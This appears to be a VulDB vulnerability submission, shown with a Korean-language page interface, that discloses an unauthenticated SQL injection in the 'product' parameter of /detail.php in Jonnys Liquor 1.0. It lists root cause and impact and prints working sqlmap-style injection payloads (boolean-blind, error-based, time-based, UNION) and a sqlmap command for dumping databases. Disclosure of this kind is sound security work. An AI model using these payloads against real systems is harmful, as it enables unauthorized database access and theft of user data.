제출 #699554: code-projects Jonnys Liquor 1.0 /detail.php SQL injection정보

제목code-projects Jonnys Liquor 1.0 /detail.php SQL injection
설명# Jonnys Liquor V1.0 – SQL-Injection in `/detail.php` ## Affected Product - **Name:** Jonnys Liquor - **Vendor Homepage:** [https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/](https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/) - **Download Link:** [https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/](https://code-projects.org/jonnys-liquor-in-php-css-javascript-and-mysql-free-download/) - **Version:** V1.0 ## Vulnerability Details - **Submitter:** yudeshui - **Vulnerable File:** `/detail.php` - **Root Cause:** User-supplied `product` GET parameter is concatenated directly into the SQL statement without sanitization or parameterization. - **CVE:** *(not assigned yet)* ## Problem Type - **Vulnerability Type:** SQL Injection - **Access Vector:** Remote, unauthenticated ## Impact Successful exploitation may lead to: - Unauthorized database access - Sensitive data leakage (users, passwords, payment info) - Data tampering or deletion - Full system compromise - Denial of service ## Proof-of-Concept Payloads Parameter: `product` (GET) ``` --- Parameter: product (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product=1 AND 5290=5290 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: product=1 OR (SELECT 7427 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(7427=7427,1))),0x716b717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: product=1 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))hQmz) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: product=-8616 UNION ALL SELECT CONCAT(0x716b6b7071,0x4355687775584c6d74415370797452755648785363736c4b444c7a4d45787a557665567369594664,0x716b717871)-- - --- ``` ## Sqlmap Quick-Check ```bash sqlmap -u "http://dede:802/detail.php?product=1" --dbs --batch --level=3 --risk=3
원천⚠️ https://github.com/rassec2/dbcve/issues/5
사용자
 yudeshui (UID 91129)
제출2025. 11. 21. PM 04:06 (5 개월 ago)
모더레이션2025. 11. 23. AM 10:47 (2 days later)
상태수락
VulDB 항목333346 [code-projects Jonnys Liquor 1.0 GET Parameter /detail.php 제품 SQL 주입]
포인트들20

이전개요다음

Do you want to use VulDB in your project?

Use the official API to access entries easily!